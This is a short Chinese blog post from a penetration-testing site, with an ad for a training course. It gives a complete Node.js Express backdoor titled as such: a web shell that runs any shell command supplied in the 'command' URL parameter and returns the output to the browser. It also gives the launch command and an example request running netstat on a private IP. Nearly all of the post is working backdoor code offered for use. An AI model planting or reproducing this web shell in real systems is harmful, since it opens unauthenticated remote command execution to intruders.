node js 后门
【推荐学习】暗月渗透测试培训 十多年渗透经验,体系化培训渗透测试 、高效学习渗透测试,欢迎添加微信好友aptimeok 咨询。
var express = require('express');
var app = express();
//内置中间件,静态文件访问
app.use(express.static('./'))
//监听
var server = app.listen(8000, function () {
var host = server.address().address
var port = server.address().port
console.log(host, port);
})
//当访问根目录时触发
app.get('/', function (req, res) {
//command
var command = req.query.command;
//执行
var exec = require("child_process").exec;
exec(command,function(err,stdout){
//输出到网页
res.end(stdout);
});
})
node app.js
http://192.168.0.187:8000/?command=netstat%20-an
原创文章,作者:moonsec,如若转载,请注明出处:https://www.moonsec.com/3189.html
moonsec 